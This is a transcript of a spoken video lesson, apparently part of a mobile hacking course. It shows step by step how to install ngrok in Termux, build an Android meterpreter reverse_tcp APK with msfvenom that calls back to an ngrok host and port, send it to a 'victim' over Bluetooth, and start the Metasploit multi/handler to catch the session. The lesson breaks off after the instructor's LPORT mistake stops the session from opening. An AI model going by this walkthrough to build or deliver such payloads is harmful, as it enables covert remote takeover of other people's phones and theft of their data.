Hello everyone and welcome to the class. Now if you didn't face any problem and successfully created the session in our last class, then kudos to you. In this video lecture, I'll show you how you can do the same procedure with the help of Wi-Fi. First, we'll remove the Ngrok files and folders from our storage. And we'll do the procedure once again. We'll install Ngrok and everything, but in a different manner. So make sure you follow the commands without any spelling errors. Let's begin. Type ls. As you can see, the ngrok uh, file is there. A file and folder is there. So we'll simply remove it. So for that we have a command rm. Yeah. So as you can see, the ngrok has been removed. Also, we need to remove this zip file as well. So simply rm and we'll paste the file name and hit enter. So now in our device there is no ngrok, okay, as you can see, and my present working directory is home. Okay, so first of all we'll update and upgrade our device. As you can see, my Wi-Fi is connected. Now I am not connected with my mobile data. Alright, so first we'll update and upgrade our Termux. So next, simply we'll use the command which we have copied from the Chrome. The display is not the Chrome display is not visible because there is some screen issue, so screen visibility issue. So I'm just pasting the command. So you'll do pkg install wget unzip -y first. So after successfully updating and upgrading our termux, our first command was pkg install wget unzip -y, and our next command is wget https, and I mean we are cloning it from the GitHub. Okay, you remember why we use wget? Yes. So we are simply not cloning, we are getting the zip from our GitHub. So I'll give you, I mean I'll put the command in our reading material so that you can simply copy it from there and paste it. Okay, so you need not write to you need not write the full command. So yeah, till now after updating and upgrading we have given two command. First was install wget if the package was not installed for the, and the next was wget, and we are getting the zip file from GitHub and hit enter. As you can see, the zip file is getting downloaded. So the next command is unzip. We'll copy the file name and unzip it and hit enter. As you can see, ngrok file is there in our termux. Now the next step, we'll change the mode. We'll use chmod and we'll change the permission to full permission. So ngrok will get the full permission. So chmod plus x ngrok. Next we'll clear the screen, and as we know, we have successfully downloaded the files and extracted it. I mean extracted the ngrok. So now we'll again follow the same procedure as we did in our previous classes. Type in /ngrok. We'll follow the same procedure as we did in our last class. Okay, so nothing much, just the downloading procedure was very important. If you have followed the steps as demonstrated in the video, then this time you will be successfully generating the payload and session as well. I mean you successfully create the session. I have given the port as 8080. So just wait, and this time you'll surely gonna get the session status online. Yes. So we did it with the help of Wi-Fi. Now just see our web interface. It is showing 4040, and we have the forwarding as ng.ngrok.io. Yes, we have created all the sessions. Now the next thing is we'll start the MSF, I mean the MSFVenom. Yes, just check once your Wi-Fi is turned on. Yes, my Wi-Fi is turned on. Next, we'll go to uh, MSFVenom and we'll create and generate the payload. Oh, just a reminder, we did the HTTP for a try, okay? So we are again we will be creating TCP because we'll be using the TCP port. We are just, testing for, since we are able to, turn our session on or not. So we did HTTP. So now we did TCP with the port number 4444. So remember, we used the port number as 4444, and in the web interface we are getting 4040 port number. Also in the forwarding we are getting 13434 as a port number. So now the next thing is we'll paste the authentication token. You remember last time we also copied it from the Ngrok website and pasted in our in our Termux, right? So again we'll copy and paste the authentication token after we have generated the session. Okay, earlier what we did, dot forward slash ngrok tcp, and we have provided the port number as 4444. This 4444 port number is our device port number which we are providing, and every time the session is created a different port number will be generated from the ngrok. Okay, so after we have given this command dot forward slash ngrok tcp 4444 as a port number, next we'll paste the authentication token for if you just don't remember from where we'll get this authentication token, just log in to Ngrok website. There you will find authentication, and in authentication tab, you will, in the right hand side, you will see, topmost right hand side, you will see Ngrok authentication is there. Simply copy, paste it and hit enter. As you can see, the session has been successfully created and showing session status online. Alright, so once again we'll check whether our Wi-Fi is turned on or off. Yes, our Wi-Fi is turned on. See, there is no mobile data on, no hotspot on. Next, we'll just open up a new session and we'll go to Metasploit framework. So you can see my present working directory is home, cd space dot dot ls, cd usr, then cd opt, then ls. We'll see Metasploit framework, right? So cd Metasploit framework dot forward slash MSFVenom minus p. Same procedure as we did last time. Okay, Android Metasploiter forward slash reverse TCP. So for the L host, again we'll go to our ngrok session. We'll copy it. Make sure you copy correctly. Okay, from 0.tcp.ngrok.io. Only this much will provide to L host. Yeah. Okay. And for the L port, the port which Ngrok has provided us, that is 19691, right? 19691, and then minus O for output, and then the location, SD card, that is internal storage, and the name of the APK. By now you must be familiar with all these terms, right? Because we have been practicing from from past quite a few classes. Yeah, so I'm giving it the name as zzz1111.apk for our for our convenience. Just wait for a few seconds and your APK would be done. Alright, it's saved. Next, dot forward slash MSFVenom. This time you just need not write that sorry, MSF console. Yeah, make sure you write the correct spelling. Oh, I'm not in, I'm in directory MSF console. Just a second. Oh, I have written MFS, so it's MSF console. So yeah, make sure you write the correct spelling. Okay, so it's MSF console. Even I am getting confused at times. So yeah, dot forward slash MSF console and hit enter. Your Metasploit framework console will start. So next, first check your database is connected or not. So for that, db underscore status. Yes, connected to MSF database. Now the same use command which we used to do. Now before that, let's sign the APK and send it to our victim. Sign and share it auto, and then share it via Bluetooth. As you can see, we have shared our file, and the same method like our and it has successfully been sent. So the same method, our victim must have installed it. Must have not, I have installed it. So yeah, and also now it's time to exploit and try the exploit. Okay, so yeah, I'm not showing that installation procedure again and again. So it's the same way. Just click the click the APK and install it. Okay, now we'll use the use command as we did earlier. So use exploit and /multi /handler. Next we have set payload Android meterpreter. Next we'll set the L host. Make sure you give the correct L host. And next, the very important L port. You remember which L port we have said at the beginning of our session? Yes, 4444. I hope I am right. Sorry, 4040, right? Yeah. So yeah, we have just a minute. So as you can as you have seen in our session, it was 4040 L port, but in our earlier session we have set it to 4444. Always write the L port, which is the port which has been given from our session. Okay, just a second, I'll show you once again. Oh no, can you see the blunder which I made? I have set the L port as 4040, which was there in the session, but that's not the port, that's the web interface. If you come to the session 1 and see, it's a web interface which has been provided by Ngrok. Our port was 4444, which we have created. So for that, if I now type exploit and hit enter, the session won't be created. Make sure you do not do this mistake which I am doing. Which I've done here. Okay, so make sure you'll while you are setting the L port, the L port should be the port which you have given at the time of setting the ngrok ./ngrok and then TCP and the port number. Okay, not the web interface port which has been shown in the ngrok. Okay, as you can see, as soon as I type exploit and hit enter, no session was created is showing up.